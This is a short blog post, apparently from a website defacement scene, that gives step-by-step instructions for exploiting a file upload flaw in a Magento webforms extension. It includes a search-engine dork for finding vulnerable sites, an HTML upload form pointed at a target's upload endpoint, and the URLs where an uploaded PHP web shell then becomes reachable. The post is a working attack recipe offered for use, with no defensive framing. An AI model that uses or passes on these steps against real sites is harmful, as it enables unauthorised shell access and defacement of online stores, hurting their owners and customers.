Header Ads

Deface With "Magento File Upload Vulnerabilty




#######################################################
Google dork : inurl:js/webforms/
Prof : /js/webforms/upload/index.php
Site Vuln : []

CSRF (NotePad Save x.Html)
<form method="POST" action="https://site.Target.com/js/webforms/upload/index.php" enctype="multipart/form-data"> <input type="file" name="files[]" /><button>Upload</button> </form>

Cek hasil Shell/txt

https://site.target.com/js/webforms/upload/files/[random]/urshell.php

Or https://site.target.com/js/webforms/upload/files/[random]/x.txt

Shared : dark-cannon 

##########################################################################################

No comments

Powered by Blogger.